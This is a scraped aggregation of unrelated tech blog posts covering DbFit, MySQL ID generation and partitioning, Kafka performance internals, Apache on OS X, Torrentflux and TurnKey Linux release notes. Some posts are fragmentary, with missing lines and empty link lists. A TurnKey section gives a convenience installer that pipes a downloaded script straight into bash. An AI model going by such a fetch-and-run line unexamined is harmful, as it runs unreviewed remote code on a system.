Supports all major DBs Out-of-the-box support for Oracle, SQL Server, MySQL, DB2, PostgreSQL, HSQLDB and Derby.


Getting Started

  1. Install the JRE
  2. Download DbFit
  3. Unzip the archive into a convenient folder


  1. Run startFitnesse.bat; a command prompt opens and DbFit starts.
  2. Browse to http://localhost:8085/ and DbFit's front page is displayed.


Browsing to http://localhost:8085/[page name] creates a page at that URL. For example, visiting http://localhost:8085/HelloWorld creates a page named HelloWorld.


Write your test code and save it with Save.


# Load the DbFit extension into FitNesse
!path lib/*.jar

# Connect to Postgres

# Test that nation equals 'JAPAN'
!|Query|select top 1 trim(c_nation) as nation from customer where c_custkey = 98|


Click Test to run the tests and display the results.



Press Ctrl + C in the running command prompt to shut DbFit down.

          Lamp, Mamp and Wamp        
LAMP is an acronym for Linux, Apache, MySQL and PHP. MAMP is an acronym for Mac, Apache, MySQL and PHP. And, as you'd expect, WAMP is an acronym for Windows, Apache, MySQL and PHP. Each is a download that packages Apache, MySQL and PHP together and lets you build and host websites locally. It is […]
          Argeweb – Interesting market opportunities for hosting through virtualization        
Argeweb is based in Maassluis and operates its own server rooms in, among other places, Schiphol-Rijk and Amsterdam. By early 2009 the organization had registered more than 70,000 domain names for its customers, many of which resolve to websites hosted by Argeweb. Argeweb has deep expertise in Windows Server, SQL Server and ASP.NET and has been a Microsoft Gold Certified partner since 2007, including in the area of hosting. Argeweb is one of the fastest-growing providers in domain registration and web hosting. By deploying Windows Server 2008 and Hyper-V virtualization, Argeweb can offer its customers a high-quality, scalable hosting platform at low cost. "Thanks to Hyper-V, Argeweb can now offer its customers a high-quality virtual dedicated server solution," says Ruben van der Zwan, IT manager at Argeweb. He explains: "On a single physical server we can run as many as 35 virtual servers. That amounts to a space saving of a factor of 6 to 7 and a proportionally lower power consumption. Reliability remains guaranteed through the use of professional hardware with the best support contracts." Now that the physical servers are used far more efficiently while remaining easy to manage, Argeweb can offer the market a very affordable hosting product, including support for PHP5 and MySQL. The Windows Server 2008 web server additionally adds support for FrontPage Server Extensions, ASP.NET, classic ASP, Silverlight, AJAX, and both PHP4 and PHP5 at the same time. "The broad support Windows Server 2008 offers, combined with the advantages of virtualization, led us to decide to run every new hosting package on Windows Server 2008, unless the customer decides otherwise," says Mr. Van der Zwan.

MySQL's auto_increment feature can be borrowed to generate unique, reliable IDs.

The table definition; the key points are auto_increment and the UNIQUE KEY:

CREATE TABLE `Tickets64` (
  `id` bigint(20) unsigned NOT NULL auto_increment,
  `stub` char(1) NOT NULL default '',
  PRIMARY KEY  (`id`),
  UNIQUE KEY `stub` (`stub`)
);

When an ID is needed, the trick is to use the REPLACE INTO syntax to obtain a value; combined with the UNIQUE KEY in the table definition, a single row is all the ID generator needs:

REPLACE INTO Tickets64 (stub) VALUES ('a');


It is multi-user safe because multiple clients can issue the UPDATE statement and
get their own sequence value with the SELECT statement (or mysql_insert_id()),
without affecting or being affected by other clients that generate their own sequence values.

Note that if the client is PHP, mysql_insert_id() cannot be used to fetch the ID. For the reason, see "Problems with mysql_insert_id() on bigint auto_increment fields": http://kaifage.com/notes/99/mysql-insert-id-issue-with-bigint-ai-field.html.

Flickr adopted this approach: http://code.flickr.net/2010/02/08/ticket-servers-distributed-unique-primary-keys-on-the-cheap/
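The single-row ticket pattern can be sketched in a few lines of Python. SQLite is used here purely as a stand-in for MySQL, since it also supports REPLACE INTO and monotonically increasing AUTOINCREMENT rowids; the table and column names follow the example above:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("""
    CREATE TABLE Tickets64 (
        id   INTEGER PRIMARY KEY AUTOINCREMENT,  -- stands in for bigint auto_increment
        stub TEXT NOT NULL UNIQUE DEFAULT ''     -- UNIQUE keeps the table at one row
    )
""")

def next_ticket(conn):
    # REPLACE deletes the old 'a' row and inserts a fresh one,
    # so every call yields a new, strictly increasing id
    cur = conn.execute("REPLACE INTO Tickets64 (stub) VALUES ('a')")
    return cur.lastrowid

ids = [next_ticket(conn) for _ in range(3)]
print(ids)  # [1, 2, 3]
```

The UNIQUE constraint on `stub` is what keeps the table to a single row no matter how many IDs are handed out.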




Posted by SIMONE, 2016-06-28 18:48


MySQL 5.1 has reached beta, and the official site has been publishing a series of articles about it, such as "Improving Database Performance with Partitioning", which I read recently. With partitioning, MySQL can handle very large data volumes. Today I saw a follow-up article on the MySQL site on partitioning by date. Being able to partition by date is an extremely practical feature for time-sensitive data. Below are some excerpts from that article.



mysql> create table rms (d date)
    -> partition by range (d)
    -> (partition p0 values less than ('1995-01-01'),
    ->  partition p1 VALUES LESS THAN ('2010-01-01'));



ERROR 1064 (42000): VALUES value must be of same type as partition function near '),
partition p1 VALUES LESS THAN ('2010-01-01'))' at line 3


mysql> CREATE TABLE part_date1
    ->      (  c1 int default NULL,
    ->  c2 varchar(30) default NULL,
    ->  c3 date default NULL) engine=myisam
    ->      partition by range (cast(date_format(c3,'%Y%m%d') as signed))
    -> (PARTITION p0 VALUES LESS THAN (19950101),
    -> PARTITION p1 VALUES LESS THAN (19960101) ,
    -> PARTITION p2 VALUES LESS THAN (19970101) ,
    -> PARTITION p3 VALUES LESS THAN (19980101) ,
    -> PARTITION p4 VALUES LESS THAN (19990101) ,
    -> PARTITION p5 VALUES LESS THAN (20000101) ,
    -> PARTITION p6 VALUES LESS THAN (20010101) ,
    -> PARTITION p7 VALUES LESS THAN (20020101) ,
    -> PARTITION p8 VALUES LESS THAN (20030101) ,
    -> PARTITION p9 VALUES LESS THAN (20040101) ,
    -> PARTITION p10 VALUES LESS THAN (20100101),
    -> PARTITION p11 VALUES LESS THAN MAXVALUE);
Query OK, 0 rows affected (0.01 sec)



mysql> explain partitions
    -> select count(*) from part_date1 where
    ->      c3 > date '1995-01-01' and c3 < date '1995-12-31'\G
*************************** 1. row ***************************
           id: 1
  select_type: SIMPLE
        table: part_date1
   partitions: p0,p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11
         type: ALL
possible_keys: NULL
          key: NULL
      key_len: NULL
          ref: NULL
         rows: 8100000
        Extra: Using where
1 row in set (0.00 sec)





  • TO_DAYS()
  • YEAR()


mysql> CREATE TABLE part_date3
    ->      (  c1 int default NULL,
    ->  c2 varchar(30) default NULL,
    ->  c3 date default NULL) engine=myisam
    ->      partition by range (to_days(c3))
    -> (PARTITION p0 VALUES LESS THAN (to_days('1995-01-01')),
    -> PARTITION p1 VALUES LESS THAN (to_days('1996-01-01')) ,
    -> PARTITION p2 VALUES LESS THAN (to_days('1997-01-01')) ,
    -> PARTITION p3 VALUES LESS THAN (to_days('1998-01-01')) ,
    -> PARTITION p4 VALUES LESS THAN (to_days('1999-01-01')) ,
    -> PARTITION p5 VALUES LESS THAN (to_days('2000-01-01')) ,
    -> PARTITION p6 VALUES LESS THAN (to_days('2001-01-01')) ,
    -> PARTITION p7 VALUES LESS THAN (to_days('2002-01-01')) ,
    -> PARTITION p8 VALUES LESS THAN (to_days('2003-01-01')) ,
    -> PARTITION p9 VALUES LESS THAN (to_days('2004-01-01')) ,
    -> PARTITION p10 VALUES LESS THAN (to_days('2010-01-01')),
    -> PARTITION p11 VALUES LESS THAN MAXVALUE);
Query OK, 0 rows affected (0.00 sec)



mysql> explain partitions
    -> select count(*) from part_date3 where
    ->      c3 > date '1995-01-01' and c3 < date '1995-12-31'\G
*************************** 1. row ***************************
           id: 1
  select_type: SIMPLE
        table: part_date3
   partitions: p1
         type: ALL
possible_keys: NULL
          key: NULL
      key_len: NULL
          ref: NULL
         rows: 808431
        Extra: Using where
1 row in set (0.00 sec)



mysql> select count(*) from part_date3 where
    ->      c3 > date '1995-01-01' and c3 < date '1995-12-31';
+----------+
| count(*) |
+----------+
|   805114 |
+----------+
1 row in set (4.11 sec)

mysql> select count(*) from part_date1 where
    ->      c3 > date '1995-01-01' and c3 < date '1995-12-31';
+----------+
| count(*) |
+----------+
|   805114 |
+----------+
1 row in set (40.33 sec)




CEILING() and FLOOR() (a partitioned table may use these two functions only if the partitioning key they are applied to is an INT type), for example:

mysql> CREATE TABLE t (c FLOAT) PARTITION BY LIST( FLOOR(c) )(
    -> PARTITION p0 VALUES IN (1,3,5),
    -> PARTITION p1 VALUES IN (2,4,6)
    -> );
ERROR 1491 (HY000): The PARTITION function returns the wrong type

mysql> CREATE TABLE t (c int) PARTITION BY LIST( FLOOR(c) )(
    -> PARTITION p0 VALUES IN (1,3,5),
    -> PARTITION p1 VALUES IN (2,4,6)
    -> );
Query OK, 0 rows affected (0.01 sec)


Posted by SIMONE, 2016-06-07 18:06

          The secrets of Kafka's high-throughput performance        


1.    Topic: a logical concept used to group Messages; a single Topic can be spread across multiple Brokers.

2.    Partition: the basis of horizontal scaling and all parallelism in Kafka; every Topic is split into at least one Partition.

3.    Offset: the sequence number of a Message within its Partition; numbering does not cross Partitions.

4.    Consumer: fetches/consumes Messages from Brokers.

5.    Producer: sends/produces Messages to Brokers.

6.    Replication: Kafka supports redundant backup of Messages at Partition granularity; each Partition can be configured with at least one Replication (with exactly one Replication, the Partition is its own sole replica).

7.    Leader: each Replication set elects a unique Leader for the Partition, and all read and write requests are handled by the Leader. The other Replicas sync updates from the Leader to local storage, much like the familiar Binlog replication in MySQL.

8.    Broker: Brokers accept requests from Producers and Consumers and persist Messages to local disk. Each Cluster elects one Broker to act as Controller, responsible for Partition Leader election, coordinating Partition migration, and so on.

9.    ISR (In-Sync Replica): the subset of Replicas that are currently alive and able to "catch up" with the Leader. Because reads and writes land on the Leader first, Replicas that pull data from the Leader generally lag behind it somewhat (measured in both elapsed time and message count); exceeding either threshold evicts a Replica from the ISR. Each Partition maintains its own independent ISR.




First, "disciplined" because Kafka performs only sequential I/O on disk; given how a messaging system reads and writes, this poses no problem. On disk I/O performance, here is a set of test figures published by Kafka (RAID-5, 7200 rpm):

Sequence I/O: 600MB/s

Random I/O: 100KB/s

So by restricting itself to sequential I/O, Kafka avoids the performance hit that slow disk access would otherwise cause.




·         If the cache is managed inside the heap, the JVM's GC threads scan the heap frequently, adding needless overhead; and if the heap is large, a single Full GC becomes a serious threat to availability.

·         Every object inside the JVM carries some Object Overhead (never underestimate it), which lowers the effective utilization of memory.

·         Every In-Process Cache is mirrored by an identical copy in the OS PageCache anyway, so keeping the cache only in the PageCache at least doubles the usable cache space.

·         If Kafka restarts, all In-Process Caches are lost, while the OS-managed PageCache remains usable.


1.    The OS reads data from disk into the PageCache in kernel space.

2.    The user process copies the data from kernel space into user space.

3.    The user process then writes the data to a socket, and the data flows into the kernel-space Socket Buffer.

4.    The OS copies the data from the Socket Buffer to the NIC's buffer, completing one send.

The whole process costs two context switches and four system calls, with the same data copied back and forth between kernel and user buffers, which is inefficient. Steps 2 and 3 are unnecessary; the copy could be completed entirely in kernel space. That is exactly the problem Sendfile solves: with the Sendfile optimization, the I/O path becomes the following.
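The kernel-only path can be demonstrated with Python's os.sendfile, which wraps the same syscall Kafka relies on. This is a minimal sketch, not Kafka code: a socketpair stands in for the network peer, and Linux-style sendfile semantics are assumed:

```python
import os
import socket
import tempfile

DATA = b"x" * 16384

# Stage the "log segment" on disk
with tempfile.NamedTemporaryFile(delete=False) as f:
    f.write(DATA)
    path = f.name

# A connected socket pair stands in for broker -> consumer
out_sock, in_sock = socket.socketpair()

with open(path, "rb") as src:
    sent = 0
    while sent < len(DATA):
        # file -> socket entirely inside the kernel: no copy through user space
        sent += os.sendfile(out_sock.fileno(), src.fileno(), sent, len(DATA) - sent)
out_sock.close()

received = b""
while len(received) < len(DATA):
    chunk = in_sock.recv(65536)
    if not chunk:
        break
    received += chunk
in_sock.close()
os.unlink(path)
print(len(received))  # 16384
```

The user process never touches the bytes; it only tells the kernel which file region to push to which socket, which is steps 2 and 3 eliminated.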


(20 Brokers, 75 Partitions per Broker, 110k msg/s)

At this point the cluster is handling only writes, no reads. The roughly 10M/s of send traffic is generated by replication between Partitions. Comparing the recv and writ rates shows that disk writes use an asynchronous, batched approach, and the underlying OS is probably also optimizing the ordering of disk writes. When Read Requests do arrive there are two cases; in the first, the data exchange completes in memory.



The other metrics look the same as before, while disk reads have spiked to 40+MB/s; at this point all the data is being served from disk (for sequential disk reads, the OS optimizes by prefilling the PageCache). Still no performance problems at all.


1.    Kafka officially advises against forcing writes to disk via the broker settings log.flush.interval.messages and log.flush.interval.ms; data reliability should be guaranteed by Replicas, and forcing a flush to disk hurts overall performance.

2.    Performance can be tuned by adjusting /proc/sys/vm/dirty_background_ratio and /proc/sys/vm/dirty_ratio.

a.    When the dirty-page ratio exceeds the first threshold, pdflush starts flushing the dirty PageCache.

b.    When the dirty-page ratio exceeds the second threshold, all writes block until the flush completes.

c.    Depending on business requirements, it is reasonable to lower dirty_background_ratio and raise dirty_ratio.
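For example, the two thresholds can be set persistently in /etc/sysctl.conf; the values below are purely illustrative, not a recommendation from the text:

```
# /etc/sysctl.conf -- writeback tuning (illustrative values)
# start background flushing (pdflush) earlier, at 5% dirty pages
vm.dirty_background_ratio = 5
# only block writers once dirty pages reach 60%
vm.dirty_ratio = 60
```

Apply the change with `sysctl -p` and verify with `sysctl vm.dirty_ratio`.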



On scalability: first, Kafka allows Partitions to be moved freely between the cluster's Brokers, to balance out any data skew. Second, Partitions support custom partitioning algorithms, e.g. routing all Messages with the same Key to the same Partition. The Leader can also migrate within the In-Sync Replicas. Because all reads and writes for any given Partition are handled only by its Leader, Kafka tries to spread Leaders evenly across the cluster's nodes to keep network traffic from concentrating.

On concurrency: at any moment a Partition can be consumed by only one Consumer within a Consumer Group (conversely, one Consumer can consume several Partitions at once). Kafka's very lean Offset mechanism minimizes interaction between Broker and Consumer, so unlike comparable message queues, Kafka's performance does not degrade proportionally as the number of downstream Consumers grows. Moreover, if several Consumers happen to be consuming data that is close together in time, the PageCache hit rate is high, so Kafka serves highly concurrent reads very efficiently; in practice it can roughly saturate a single machine's network card.

That said, more Partitions is not always better: the more Partitions there are, the more land on each Broker on average. If a Broker goes down (Network Failure, Full GC), the Controller must re-elect a Leader for every Partition on every failed Broker. Assuming each Partition's election takes 10ms, a Broker carrying 500 Partitions spends 5s on elections, during which reads and writes on those Partitions all raise LeaderNotAvailableException.

Worse still, if the failed Broker was the cluster's Controller, the first step is appointing another Broker as Controller. The new Controller must fetch the Meta information for every Partition from Zookeeper, at roughly 3-5ms each, so with 10,000 Partitions this alone takes 30s-50s. And don't forget that is only the time to bring up a new Controller; the Leader-election time described above comes on top of it!
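The failure-window arithmetic quoted above can be checked directly; the per-Partition costs are the ones given in the text:

```python
# Leader re-election after a Broker crash (costs quoted in the text)
election_ms = 10                     # per-Partition election cost
partitions_on_broker = 500
unavailable_s = partitions_on_broker * election_ms / 1000
print(unavailable_s)                 # 5.0 s of LeaderNotAvailableException

# Controller failover: re-reading Partition metadata from Zookeeper
fetch_ms_low, fetch_ms_high = 3, 5   # per-Partition metadata fetch cost
total_partitions = 10_000
rebuild_low_s = total_partitions * fetch_ms_low / 1000
rebuild_high_s = total_partitions * fetch_ms_high / 1000
print(rebuild_low_s, rebuild_high_s)  # 30.0 50.0, before elections even start
```

Both windows grow linearly with the Partition count, which is exactly why the recommendations below argue against over-partitioning.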



1.    Pre-allocate the number of Partitions up front as much as possible. Partitions can be added dynamically later, but that risks breaking the mapping between Message Keys and Partitions.

2.    Don't configure too many Replicas, and if conditions allow, spread the Partitions within a Replica set across different Racks.

3.    Make every effort to ensure a Clean Shutdown whenever a Broker is stopped; otherwise the problem is not merely a long recovery time, but possible data corruption or other very strange issues.






Of course, users can choose to compress and decompress at the application layer themselves (after all, Kafka currently supports a limited set of compression algorithms, only GZIP and Snappy), but doing so actually backfires and reduces efficiency! Kafka's End-to-End compression works best in concert with MessageSets, and the do-it-yourself approach severs that link. The reason is simple, resting on a basic principle of compression: the more repeated data, the higher the compression ratio. Independent of message content and message count, a larger input will in most cases achieve a better compression ratio.


To solve this, Kafka's 0.8 design borrowed the ack mechanism from networking. If performance matters most and a degree of Message loss is acceptable, set request.required.acks=0 to disable acks and send at full speed. If sent messages must be acknowledged, set request.required.acks to 1 or -1. So what is the difference between 1 and -1? This comes back to the Replica count discussed earlier: with 1, the message only needs to be acknowledged by the Partition's Leader.

          Apache, MySQL and PHP in OS X Mavericks 10.9        
Unfortunately, upgrading from OS X Mountain Lion (10.8) to Mavericks (10.9) stopped my AMP (Apache, MySQL, PHP) installation from working.

Luckily, this is just down to an apache configuration file being overwritten and is easy to correct...

1. Edit Apache Configuration

sudo vi /private/etc/apache2/httpd.conf

a. Uncomment following line to re-enable virtual hosts: -

    Include /private/etc/apache2/extra/httpd-vhosts.conf

b. Uncomment following line to re-enable PHP: -

    LoadModule php5_module libexec/apache2/libphp5.so

2. Restart Apache

sudo apachectl restart

There was no need to change anything in my MySQL installation; it continued working after the upgrade.

          Installing Torrentflux on the Viglen MPC-L        
This is a quick guide to installing Torrentflux on my Viglen MPC-L.

First, make sure that python, mysql-server and mysql-client are installed.

Then simply install the software with apt-get: -
    sudo apt-get install torrentflux

Once it is installed, point your web browser at the following location (where a.b.c.d is the IP address of your Viglen): -


...and then start uploading .torrent files to it.

By default, files are saved in the following location: -

By default, the ports used are 49160-49300, so remember to open these on your firewall/router.
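On a Linux-based firewall, opening that range might look like the following; the chain and policy are assumptions, so adapt the rules to your own router setup:

```
# allow inbound BitTorrent traffic on Torrentflux's default port range
iptables -A INPUT -p tcp --dport 49160:49300 -j ACCEPT
iptables -A INPUT -p udp --dport 49160:49300 -j ACCEPT
```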
          Fall 2016 tech reading        
It's almost the end of the year, so here's another big list to go through while you wait at the airport on your way to your vacation.


Streaming JSON and JAX-RS streaming

Java Strings

Data - Small and Big

Channels and Actors



Misc Science/Tech

Misc - Fun, Tidbits

Happy holidays!

          Fall 2015 tech reading        
Big systems:
Until next time!
          Summer 2015 tech reading and goodies        
Graph and other stores:
  • http://www.slideshare.net/HBaseCon/use-cases-session-5
  • http://www.datastax.com/dev/blog/tales-from-the-tinkerpop
  • TAO: Facebook's Distributed Data Store for the Social Graph
    Architecture & Implementation
    All of the data for objects and associations is stored in MySQL. A non-SQL store could also have been used, but when looking at the bigger picture SQL still has many advantages:
    …it is important to consider the data accesses that don’t use the API. These include back-ups, bulk import and deletion of data, bulk migrations from one data format to another, replica creation, asynchronous replication, consistency monitoring tools, and operational debugging. An alternate store would also have to provide atomic write transactions, efficient granular writes, and few latency outliers
  • Twitter Heron: Stream Processing at Scale
    Storm has no backpressure mechanism. If the receiver component is unable to handle incoming data/tuples, then the sender simply drops tuples. This is a fail-fast mechanism, and a simple strategy, but it has the following disadvantages:
    Second, as mentioned in [20], Storm uses Zookeeper extensively to manage heartbeats from the workers and the supervisors. This use of Zookeeper limits the number of workers per topology, and the total number of topologies in a cluster, since at very large numbers Zookeeper becomes the bottleneck.
    Hence in Storm, each tuple has to pass through four threads from the point of entry to the point of exit inside the worker process. This design leads to significant overhead and queue contention issues.
    Furthermore, each worker can run disparate tasks. For example, a Kafka spout, a bolt that joins the incoming tuples with a Twitter internal service, and another bolt writing output to a key-value store might be running in the same JVM. In such scenarios, it is difficult to reason about the behavior and the performance of a particular task, since it is not possible to isolate its resource usage. As a result, the favored troubleshooting mechanism is to restart the topology. After restart, it is perfectly possible that the misbehaving task could be scheduled with some other task(s), thereby making it hard to track down the root cause of the original problem.
    Since logs from multiple tasks are written into a single file, it is hard to identify any errors or exceptions that are associated with a particular task. The situation gets worse quickly if some tasks log a larger amount of information compared to other tasks. Furthermore, an unhandled exception in a single task takes down the entire worker process, thereby killing other (perfectly fine) running tasks. Thus, errors in one part of the topology can indirectly impact the performance of other parts of the topology, leading to high variance in the overall performance. In addition, disparate tasks make garbage collection related-issues extremely hard to track down in practice.
    For resource allocation purposes, Storm assumes that every worker is homogenous. This architectural assumption results in inefficient utilization of allocated resources, and often results in over-provisioning. For example, consider scheduling 3 spouts and 1 bolt on 2 workers. Assuming that the bolt and the spout tasks each need 10GB and 5GB of memory respectively, this topology needs to reserve a total of 15GB memory per worker since one of the worker has to run a bolt and a spout task. This allocation policy leads to a total of 30GB of memory for the topology, while only 25GB of memory is actually required; thus, wasting 5GB of memory resource. This problem gets worse with increasing number of diverse components being packed into a worker
    A tuple failure anywhere in the tuple tree leads to failure of the entire tuple tree . This effect is more pronounced with high fan-out topologies where the topology is not doing any useful work, but is simply replaying the tuples.
    The next option was to consider using another existing open- source solution, such as Apache Samza [2] or Spark Streaming [18]. However, there are a number of issues with respect to making these systems work in its current form at our scale. In addition, these systems are not compatible with Storm’s API. Rewriting the existing topologies with a different API would have been time consuming resulting in a very long migration process. Also note that there are different libraries that have been developed on top of the Storm API, such as Summingbird [8], and if we changed the underlying API of the streaming platform, we would have to change other components in our stack.
Until next time!

          TurnKey 13 out, TKLBAM 1.4 now backup/restores any Linux system        

This is really two separate announcements rolled into one:

  1. TurnKey 13 - codenamed "satisfaction guaranteed or your money back!"

    The new release celebrates 5 years since TurnKey's launch. It's based on the latest version of Debian (7.2) and includes 1400 ready-to-use images: 330GB worth of 100% open source, guru integrated, Linux system goodness in 7 build types that are optimized and pre-tested for nearly any deployment scenario: bare metal, virtual machines and hypervisors of all kinds, "headless" private and public cloud deployments, etc.

    New apps in this release include OpenVPN, Observium and Tendenci.

    We hope this new release reinforces the explosion in active 24x7 production deployments (37,521 servers worldwide) we've seen since the previous 12.1 release, which added 64-bit support and the ability to rebuild any system from scratch using TKLDev, our new self-contained build appliance (AKA "the mothership").

    To visualize active deployments world wide, I ran the archive.turnkeylinux.org access logs through GeoIPCity and overlaid the GPS coordinates on this Google map (view full screen):


  2. TKLBAM 1.4 - codenamed "give me liberty or give me death!"

    Frees TKLBAM from its shackles so it can now backup files, databases and package management state without requiring TurnKey Linux, a TurnKey Hub account or even a network connection. Having those will improve the usage experience, but the new release does its best with what you give it.

    I've created a convenience script to help you install it in a few seconds on any Debian or Ubuntu derived system:

    wget -O - -q $URL | PACKAGE=tklbam /bin/bash

    There's nothing preventing TKLBAM from working on non-Debian/Ubuntu Linux systems as well; you just need to install from source and disable APT integration with the --skip-packages option.

    Other highlights: support for PostgreSQL, MySQL views & triggers, and a major usability rehaul designed to make it easier to understand and control how everything works. Magic can be scary in a backup tool.

    Here's a TurnKey Hub screenshot I took testing TKLBAM on various versions of Ubuntu:

    Screenshot of TurnKey Hub backups

Announcement late? Blame my problem child

As those of you following TurnKey closely may have already noticed, the website was actually updated with the TurnKey 13.0 images a few weeks ago.

I was supposed to officially announce TurnKey 13's release around the same time but got greedy and decided to wrap up TKLBAM 1.4 first and announce them together.

TKLBAM 1.4 wasn't supposed to happen. That it did is the result of a spontaneous binge of passionate development I got sucked into after realizing how close I was to making it a lot more useful to a lot more people. From the release notes:

More people would find TKLBAM useful if:

  • If it worked on other Linux distributions (e.g., Debian and Ubuntu to begin with)

  • If users understood how it worked and realized they were in control. Magic is scary in a backup tool.

  • If it worked without the TurnKey Hub or better yet without needing a network connection at all.

  • If users realized that TKLBAM works with all the usual non-cloud storage back-ends such as the local filesystem, rsync, ftp, ssh, etc.

  • If users could more easily tell when something is wrong, diagnose the problem and fix it without having to go through TKLBAM's code or internals

  • If users could mix and match different parts of TKLBAM as required (e.g., the part that identifies system changes, the part that interfaces with Duplicity to incrementally update their encrypted backup archives, etc.)

  • If users could embed TKLBAM in their existing backup solutions

  • If users realized TKLBAM allowed them to backup different things at different frequencies (e.g., the database every hour, the code every day, the system every week)

    Monolithic all-or-nothing system-level backups are not the only way to go.

  • If it could help with broken migrations (e.g., restoring a backup from TurnKey Redmine 12 to TurnKey Redmine 13)

  • If it worked more robustly, tolerated failures, and with fewer bugs

So that's why the release announcement is late and Alon is slightly pissed off but I'm hoping the end result makes up for it.

TurnKey 13: from 0.5GB to 330GB in 5 years

Big things have small beginnings. We launched TurnKey Linux five years ago in 2008 as a cool side project that took up 0.5GB on SourceForge and distributed 3 installable Live CD images of LAMP stack, Drupal and Joomla.

5 years later the project has ballooned to over 330GB spanning 1400 images: 100 apps, 7 build types, in both 64-bit and 32-bit versions. So now we're getting upset emails from SourceForge asking if the project really needs to take up so much disk space.

Yes, and sorry about that. For what it's worth, realizing TurnKey may eventually outgrow SourceForge is part of the reason we created our own independent mirror network (well, that and rsync/ftp access). Sourceforge is great, but just in case...

93,555 lines of code in 177 git repos

In terms of development, I recently collected stats on the 177 git repositories that make up the app library, self-contained build system, and a variety of custom components (e.g., TKLBAM, the TurnKey Hub).

It turns out over the years we've written about 93,555 lines of code just for TurnKey, most of it in Python and shell script. Check it out:

Late but open (and hopefully worth it)

TurnKey 13 came out a few months later than we originally planned. By now we have a pretty good handle on what it takes to push out a release so the main reason for the delay was that we kept moving the goal posts.

In a nutshell, we decided it was more important for the next major TurnKey release to be open than it was to come out early.

The main disadvantage was that Debian 7 ("Wheezy") had come out in the meantime and TurnKey 12 was based on Debian 6 ("Squeeze"). On the other hand, Debian 6 would be supported for another year, and since TurnKey is just Debian under the hood, nothing prevented impatient users who wanted the base operating system on Debian 7 from going through the usual automated and relatively painless Debian upgrade procedure.

So we first finished work on TKLDev, put it through the trenches with the TurnKey 12.1 maintenance release, and moved the project's development infrastructure to GitHub where all development could happen out in the open.

We hoped to see a steady increase in future open source collaboration on TurnKey's development and so far so good. I don't expect the sea to part as it takes more than just the right tools & infrastructure to really make an open source project successful. It takes community and community building takes time. TurnKey needs to win over contributors one by one.

Alon called TurnKey 13.0 "a community effort" which I think in all honesty may have been a bit premature, but we are seeing the blessed beginnings of the process in the form of a steadily growing stream of much appreciated community contributions. Not just new prototype TurnKey apps and code submissions but also more bug reports, feature requests and wiki edits.

And when word gets out on just how fun and easy it is to roll your own Linux distribution I think we'll see more of that too. Remember, with TKLDev, rolling your own Debian based Linux distribution is as easy as running make:

root@tkldev ~$ cd awesomenix
root@tkldev turnkey/awesomenix$ make

You don't even have to use TKLDev to build TurnKey apps or use any TurnKey packages or components. You can build anything you want!

Sadly, I've gotten into the nasty habit of prepending TKL - the TurnKey initials - to all the TurnKey related stuff I develop but under the hood the system is about as general purpose as it can get. It's also pretty well designed and easy to use, if I don't (cough) say so myself.

I'll be delighted if you use TKLDev to help us improve TurnKey but everyone is more than welcome to use it for other things as well.

3 new TurnKey apps - OpenVPN, Tendenci and Observium

  • OpenVPN: a full-featured open source SSL VPN solution that accommodates a wide range of configurations, including remote access, site-to-site VPNs, Wi-Fi security, and more.

    Matt Ayers from Amazon asked us to consider including an OpenVPN appliance in the next release and Alon knocked it out of the park with the integration for this one.

    The new TurnKey OpenVPN is actually a 3 for 1 - TurnKey's setup process asks whether you want OpenVPN in client, server or gateway mode and sets things up accordingly.

    My favourite feature is the one that allows the admin to create self-destructing URLs with scannable QR codes that make setting up client OpenVPN profiles on mobiles a breeze. That's pretty cool.

  • Tendenci: a content management system built specifically for NPOs (Non Profit Organizations).

    Upstream's Jenny Qian did such an excellent job developing the new TurnKey app that we accepted it into the library with only a few tiny modifications.

    This is the first time an upstream project has used TKLDev to roll their own TurnKey app. It would be awesome to see more of this happening and we'll be happy to aid any similar efforts in this vein any way we can.

  • Observium: a really cool autodiscovering SNMP based network monitoring platform.

    The new TurnKey app is based on a prototype developed by Eric Young, who also developed a few other prototype apps which we plan on welcoming into the library as soon as we work out the kinks. Awesome work Eric!

Special thanks

Contributing developers:

Extra special thanks

  • Alon's wife Hilla: for putting up with too many late work sessions.
  • Liraz's girlfriend Shir: for putting up with such a difficult specimen (in general).

Announcing TurnKey Linux 12.0: 100+ ready-to-use solutions


Ladies and gentlemen, the 12.0 release is finally out after nearly 6 months of development and just in time to celebrate TurnKey's 4th anniversary. I'm proud to announce we've more than doubled the size of the TurnKey Linux library, from 45 appliances to over 100!

As usual pushing out the release was much more work than we expected. I'd like to chalk that up to relentless optimism in the face of vulgar practical realities and basic common sense. On the flip side, we now have 100+ appliances of which 60+ are brand spanking new. Lots of good new applications are now supported.

Despite all the hard work, or maybe because of it, working on the release was the most fun I've had in a while.

You look away and then back and suddenly all this new open source stuff is out there, ready for prime time. So many innovations and competing ideas, all this free energy. We feel so privileged to have a front row seat and not just watch it all play out but also be able to play our own small role in showcasing so much high-quality open source work while making it just a bit more accessible to users.

Unlike previous releases this latest release is based on Debian, not Ubuntu. We realize this may upset hardcore Ubuntu fans but if you read on, I'll try to explain below why "defecting" to Debian was the right thing for TurnKey.

What's new?

Deprecated appliances

  • AppEngine: With the addition of Go, we decided to split the Google App Engine SDK appliance into 3 separate language specific appliances (appengine-go, appengine-java and appengine-python).
  • Joomla16: 1.6 has reached end-of-life, and has been replaced with the Joomla 2.5 appliance.
  • EC2SDK: Insufficient amount of interest to warrant maintenance, especially now that the TurnKey Hub exists.
  • Zimbra and OpenBravo: Will be re-introduced once TurnKey supports 64bit architectures. Sorry folks. We're still working on that.

Changes common to all TurnKey appliances - the TurnKey Core

As most of you know TurnKey Core is the base appliance on top of which all other TurnKey appliances are built and includes all the standard goodies.

Most of the ingredients Core is built out of come directly from the Debian package repositories. Thanks to the quality of packaging, refreshing these is usually very easy. A handful (e.g., webmin, shellinabox) we have to package ourselves directly from upstream because they're not in Debian. That takes more work, but it's still usually not a big deal.

Then there are the parts of TurnKey we developed ourselves from scratch. They're our babies and giving them the love they need usually involves more work than all the other maintenance upgrades put together. The largest of these components is TKLBAM - AKA the TurnKey Linux Backup and Migration system.

Version 1.2 of TKLBAM, which went into the release, received a round of much-needed improvements.

The highlights:

  • Backup
    • Resume support allows you to easily recover and continue aborted backup sessions.
    • Multipart parallel S3 uploads dramatically reduce the time it takes to upload backup archives to the cloud. Dial this up high enough and you can typically fully saturate your network connection.
  • Restore
    • Added embedded squid download cache to make it easier to retry failed restores (especially large multi-GB restores!) without resorting to suicide.
    • Fixed the annoying MySQL max_packet issue that made it unnecessarily difficult to restore large tables.

